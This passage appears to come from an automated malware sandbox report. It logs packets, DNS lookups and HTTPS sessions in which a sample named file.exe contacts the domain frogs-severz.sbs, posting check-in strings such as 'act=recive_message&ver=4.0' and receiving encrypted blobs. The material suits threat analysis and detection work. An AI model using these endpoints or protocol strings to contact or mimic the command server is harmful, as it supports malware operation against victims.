Nov 25, 2024 08:44:19.543056011 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:19.543065071 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:20.760200977 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:20.760277987 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:20.761779070 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:20.761789083 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:20.762090921 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:20.763439894 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:20.763470888 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:20.763560057 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.447364092 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.447415113 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.447447062 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.447460890 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:21.447490931 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.447532892 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.447546959 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:21.447556019 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.447602034 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:21.455631018 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.466938972 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.466990948 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:21.467015982 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.475406885 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.475465059 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:21.475478888 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.522102118 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:21.566778898 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.615712881 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:21.639014006 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.642923117 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.643028021 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.643105030 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:21.643220901 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:21.643234015 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.643245935 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:21.643250942 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.760143042 CET | 49734 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:21.760175943 CET | 443 | 49734 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:21.760288000 CET | 49734 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:21.760601997 CET | 49734 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:21.760615110 CET | 443 | 49734 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:23.016808987 CET | 443 | 49734 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:23.017009974 CET | 49734 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:23.019026041 CET | 49734 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:23.019035101 CET | 443 | 49734 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:23.019304991 CET | 443 | 49734 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:23.023818970 CET | 49734 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:23.024091005 CET | 49734 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:23.024123907 CET | 443 | 49734 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:23.973788023 CET | 443 | 49734 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:23.974045992 CET | 443 | 49734 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:23.974117994 CET | 49734 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:23.974284887 CET | 49734 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:23.974299908 CET | 443 | 49734 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:24.123691082 CET | 49740 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:24.123732090 CET | 443 | 49740 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:24.123806000 CET | 49740 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:24.124239922 CET | 49740 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:24.124254942 CET | 443 | 49740 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:25.389914989 CET | 443 | 49740 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:25.390044928 CET | 49740 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:25.391454935 CET | 49740 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:25.391463995 CET | 443 | 49740 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:25.391753912 CET | 443 | 49740 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:25.393399000 CET | 49740 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:25.393522024 CET | 49740 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:25.393538952 CET | 443 | 49740 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:25.393605947 CET | 49740 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:25.439331055 CET | 443 | 49740 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:26.498856068 CET | 443 | 49740 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:26.499099970 CET | 443 | 49740 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:26.499120951 CET | 49740 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:26.499155998 CET | 49740 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:26.815727949 CET | 49746 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:26.815761089 CET | 443 | 49746 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:26.815843105 CET | 49746 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:26.816123962 CET | 49746 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:26.816133976 CET | 443 | 49746 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:28.079113960 CET | 443 | 49746 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:28.079334021 CET | 49746 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:28.080498934 CET | 49746 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:28.080512047 CET | 443 | 49746 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:28.080764055 CET | 443 | 49746 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:28.081978083 CET | 49746 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:28.082108974 CET | 49746 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:28.082146883 CET | 443 | 49746 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:28.082233906 CET | 49746 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:28.082252979 CET | 443 | 49746 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:28.994473934 CET | 443 | 49746 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:28.994615078 CET | 443 | 49746 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:28.994699955 CET | 49746 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:28.995098114 CET | 49746 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:28.995116949 CET | 443 | 49746 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:29.434848070 CET | 49756 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:29.434884071 CET | 443 | 49756 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:29.434954882 CET | 49756 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:29.435277939 CET | 49756 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:29.435291052 CET | 443 | 49756 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:30.698156118 CET | 443 | 49756 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:30.698245049 CET | 49756 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:30.699563026 CET | 49756 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:30.699569941 CET | 443 | 49756 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:30.700144053 CET | 443 | 49756 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:30.701457977 CET | 49756 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:30.701533079 CET | 49756 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:30.701539993 CET | 443 | 49756 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:31.413913012 CET | 443 | 49756 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:31.414145947 CET | 443 | 49756 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:31.414211035 CET | 49756 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:31.991705894 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:31.991746902 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:31.991986990 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:31.992461920 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:31.992476940 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:33.207298994 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:33.207387924 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.208933115 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.208947897 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:33.209281921 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:33.213157892 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.213985920 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.214027882 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:33.214128017 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.214167118 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:33.214318037 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.214346886 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:33.214463949 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.214492083 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:33.215373993 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.215392113 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:33.215565920 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.215598106 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.259361029 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:33.259542942 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.259581089 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.303334951 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:33.306135893 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.306194067 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.306211948 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.347351074 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:33.347513914 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.347568989 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.395333052 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:33.395456076 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.443341017 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:33.454358101 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:33.454437017 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:33.454550982 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:33.575773001 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:36.865252018 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:36.865339041 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:36.865412951 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:36.865561008 CET | 49765 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:36.865578890 CET | 443 | 49765 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:36.906481981 CET | 49776 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:36.906523943 CET | 443 | 49776 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:36.906609058 CET | 49776 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:36.906986952 CET | 49776 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:36.907002926 CET | 443 | 49776 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:37.037755966 CET | 49776 | 443 | 192.168.2.9 | 104.21.88.250
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 25, 2024 08:44:17.067943096 CET5249953192.168.2.91.1.1.1
                                                                      Nov 25, 2024 08:44:17.298563004 CET53524991.1.1.1192.168.2.9
                                                                      Nov 25, 2024 08:44:17.303747892 CET5684953192.168.2.91.1.1.1
                                                                      Nov 25, 2024 08:44:17.524410009 CET53568491.1.1.1192.168.2.9
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 25, 2024 08:44:17.067943096 CET192.168.2.91.1.1.10x3c6cStandard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                      Nov 25, 2024 08:44:17.303747892 CET192.168.2.91.1.1.10x371dStandard query (0)frogs-severz.sbsA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Nov 25, 2024 08:44:17.298563004 CET1.1.1.1192.168.2.90x3c6cName error (3)property-imper.sbsnonenoneA (IP address)IN (0x0001)false
                                                                      Nov 25, 2024 08:44:17.524410009 CET1.1.1.1192.168.2.90x371dNo error (0)frogs-severz.sbs104.21.88.250A (IP address)IN (0x0001)false
                                                                      Nov 25, 2024 08:44:17.524410009 CET1.1.1.1192.168.2.90x371dNo error (0)frogs-severz.sbs172.67.155.47A (IP address)IN (0x0001)false
                                                                      • frogs-severz.sbs
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.949722104.21.88.2504437660C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 07:44:18 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: frogs-severz.sbs
2024-11-25 07:44:18 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-11-25 07:44:19 UTC | 1007 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 07:44:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=attmf18nbhlaebv0r43rps4hje; expires=Fri, 21-Mar-2025 01:30:58 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RAbi4HF640qQJUu3%2Brm5tBsvCBw3tMhp0ibltTYLXuMkW7k4Qr6atDuXORBFlIr24IUBI%2BxXFoTQ4YkKxPd5qcFVCZcGC2NeY6F7mT5IKmqwUsHmqd0%2FxN43lVNAVcwfsSsB"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e8003474d184402-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2146&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=1333333&cwnd=182&unsent_bytes=0&cid=26495f04854b889d&ts=693&x=0"
2024-11-25 07:44:19 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-11-25 07:44:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49728 | 104.21.88.250 | 443 | 7660 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 07:44:20 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 53
Host: frogs-severz.sbs
2024-11-25 07:44:20 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-11-25 07:44:21 UTC | 1007 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 07:44:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=18q0q3kvvp79cug91e2lb5m072; expires=Fri, 21-Mar-2025 01:31:00 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wdGiMKUTqq2e6o5%2F%2FtPRoHTcvqLrM7U50vWcPOEo0NYKKfzCehdfAjytxVcZJte8B8RA9XHxIKaQ1VXy8D98B8vI7L%2F57rpAIOgdoI5PydYQCZExsEqKmPUkYgI68igKZFdr"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e8003537a0a4237-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1558&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=953&delivery_rate=1819314&cwnd=194&unsent_bytes=0&cid=f07b5a31aabbf409&ts=697&x=0"
2024-11-25 07:44:21 UTC | 362 | IN | Data Raw: 34 34 36 63 0d 0a 55 39 46 79 34 33 2f 5a 4b 65 72 61 2b 52 58 6e 73 36 41 35 52 2b 72 72 38 50 31 6e 53 4c 77 34 51 47 44 38 74 68 4d 42 46 57 38 6f 38 77 54 42 52 65 30 46 79 4b 6d 63 4e 39 33 48 30 6b 77 69 78 73 6d 52 6d 55 56 79 32 6c 6b 73 45 35 6d 61 4d 58 64 34 54 57 6d 33 45 34 38 4d 76 41 58 49 76 34 45 33 33 65 6a 62 47 79 4b 45 79 63 72 66 41 69 4c 65 57 53 77 43 6e 64 31 38 63 58 6b 4d 4f 37 30 56 69 78 71 36 54 59 75 32 6c 48 43 43 31 73 46 54 4b 59 4f 47 6d 4a 42 46 5a 4a 35 64 4f 6b 4c 47 6c 46 35 6b 59 51 34 65 73 41 47 49 58 61 51 46 6b 66 69 63 65 38 57 4a 67 6c 67 69 69 49 65 57 6d 51 77 67 31 46 41 6b 41 35 6a 63 59 32 68 7a 42 7a 75 7a 46 6f 6f 51 73 31 6d 47 76 4a 4e 37 68 4e 7a 42 47 32 76 49 6a 6f 72 66 58 57 71 4e 61 43 45 54 6a
Data Ascii: 446cU9Fy43/ZKera+RXns6A5R+rr8P1nSLw4QGD8thMBFW8o8wTBRe0FyKmcN93H0kwixsmRmUVy2lksE5maMXd4TWm3E48MvAXIv4E33ejbGyKEycrfAiLeWSwCnd18cXkMO70Vixq6TYu2lHCC1sFTKYOGmJBFZJ5dOkLGlF5kYQ4esAGIXaQFkfice8WJglgiiIeWmQwg1FAkA5jcY2hzBzuzFooQs1mGvJN7hNzBG2vIjorfXWqNaCETj
2024-11-25 07:44:21 UTC | 1369 | IN | Data Raw: 67 4d 50 4a 55 69 69 46 69 5a 2b 56 43 69 6e 65 58 53 67 49 6b 64 35 31 62 6e 6f 4c 4d 62 4e 51 7a 31 32 38 55 38 6a 67 32 31 53 41 77 63 56 58 4d 38 71 7a 30 6f 42 4c 4d 35 35 64 4c 6b 4c 47 6c 48 6c 6d 64 41 34 36 76 42 4f 4a 46 71 6c 4c 6d 72 36 57 63 70 66 58 78 31 55 76 69 35 75 59 6b 51 4d 70 31 31 45 72 42 35 6e 51 4d 53 30 33 43 69 6e 7a 53 4d 45 38 74 6b 43 45 73 6f 78 33 78 63 36 4d 51 6d 57 50 68 64 4c 48 52 53 37 66 58 69 4d 47 6b 4e 70 31 62 33 45 44 50 4c 77 57 69 78 32 38 51 59 43 77 6d 6e 71 4f 33 73 4a 65 4b 49 79 50 6e 70 34 41 61 70 41 61 4a 52 72 65 6a 44 46 4e 63 41 34 6a 38 53 57 43 45 37 56 4d 6e 76 69 45 4f 5a 79 52 78 56 64 6c 30 4d 6d 63 6d 67 6f 34 33 30 67 6e 44 49 7a 59 64 47 56 36 44 6a 2b 7a 46 59 59 51 74 55 32 50 75 35 4e
Data Ascii: gMPJUiiFiZ+VCineXSgIkd51bnoLMbNQz128U8jg21SAwcVXM8qz0oBLM55dLkLGlHlmdA46vBOJFqlLmr6WcpfXx1Uvi5uYkQMp11ErB5nQMS03CinzSME8tkCEsox3xc6MQmWPhdLHRS7fXiMGkNp1b3EDPLwWix28QYCwmnqO3sJeKIyPnp4AapAaJRrejDFNcA4j8SWCE7VMnviEOZyRxVdl0Mmcmgo430gnDIzYdGV6Dj+zFYYQtU2Pu5N
2024-11-25 07:44:21 UTC | 1369 | IN | Data Raw: 56 64 6c 30 4d 6d 65 6c 67 55 68 31 46 34 69 42 5a 50 52 63 6d 52 30 41 44 61 35 48 6f 59 5a 74 30 4b 46 76 70 74 77 67 64 54 51 58 69 79 45 68 64 4c 52 52 53 33 47 47 6e 70 43 73 64 4e 6e 59 46 67 4f 49 4c 70 51 6e 6c 4f 69 43 34 2b 30 32 79 2f 46 31 73 64 54 4c 6f 36 42 6b 6f 30 41 4a 4e 56 62 4b 41 53 66 32 58 31 6c 64 77 77 78 74 52 79 42 47 72 78 5a 6d 72 32 64 5a 59 2b 52 6a 42 73 69 6b 4d 6e 4b 33 7a 4d 36 79 55 73 30 51 4b 76 58 66 32 31 77 47 33 47 73 58 70 68 64 76 45 66 49 34 4e 74 38 68 64 33 46 55 79 4f 4d 67 5a 32 51 44 44 6a 66 56 69 77 51 6d 64 52 34 62 58 67 42 4f 4c 34 58 6a 42 61 78 52 6f 79 2f 6d 6a 66 4c 6b 63 56 44 5a 64 44 4a 70 49 38 49 4a 76 42 52 4c 67 76 65 79 7a 39 36 4e 77 6f 39 38 30 6a 42 47 62 64 44 67 72 65 53 66 59 2f 65
Data Ascii: Vdl0MmelgUh1F4iBZPRcmR0ADa5HoYZt0KFvptwgdTQXiyEhdLRRS3GGnpCsdNnYFgOILpQnlOiC4+02y/F1sdTLo6Bko0AJNVbKASf2X1ldwwxtRyBGrxZmr2dZY+RjBsikMnK3zM6yUs0QKvXf21wG3GsXphdvEfI4Nt8hd3FUyOMgZ2QDDjfViwQmdR4bXgBOL4XjBaxRoy/mjfLkcVDZdDJpI8IJvBRLgveyz96Nwo980jBGbdDgreSfY/e
2024-11-25 07:44:21 UTC | 1369 | IN | Data Raw: 66 4a 33 4e 38 43 4d 70 34 43 59 69 32 35 34 54 4e 43 54 55 30 75 2f 51 6e 42 47 72 63 4c 30 50 69 58 64 49 6e 5a 7a 56 30 73 68 49 4f 62 6c 41 6b 68 32 6c 59 72 42 35 6a 56 64 47 5a 32 43 54 32 35 46 6f 49 65 74 45 53 48 73 4e 73 35 78 64 62 61 47 33 33 49 72 49 57 55 43 79 79 65 52 57 77 62 33 74 4e 39 49 79 39 4e 50 62 6f 57 68 78 69 33 53 6f 36 77 6e 6e 2b 42 30 4d 52 64 4a 6f 65 4e 6c 35 34 4b 4c 74 4a 55 4b 41 4f 66 32 48 70 73 66 41 68 78 2f 56 43 47 42 66 73 54 79 49 6d 59 59 5a 4c 42 7a 68 73 36 78 70 44 53 6d 41 6c 71 68 68 6f 6a 45 4a 54 65 66 32 5a 34 43 44 4b 38 46 34 77 62 74 30 47 42 73 4a 31 34 6a 4d 50 42 56 79 75 50 68 35 36 52 43 43 44 64 56 32 4a 4d 33 74 4e 70 49 79 39 4e 48 62 51 64 72 78 61 33 54 4d 69 6e 31 57 37 46 31 73 34 62 66
Data Ascii: fJ3N8CMp4CYi254TNCTU0u/QnBGrcL0PiXdInZzV0shIOblAkh2lYrB5jVdGZ2CT25FoIetESHsNs5xdbaG33IrIWUCyyeRWwb3tN9Iy9NPboWhxi3So6wnn+B0MRdJoeNl54KLtJUKAOf2HpsfAhx/VCGBfsTyImYYZLBzhs6xpDSmAlqhhojEJTef2Z4CDK8F4wbt0GBsJ14jMPBVyuPh56RCCDdV2JM3tNpIy9NHbQdrxa3TMin1W7F1s4bf
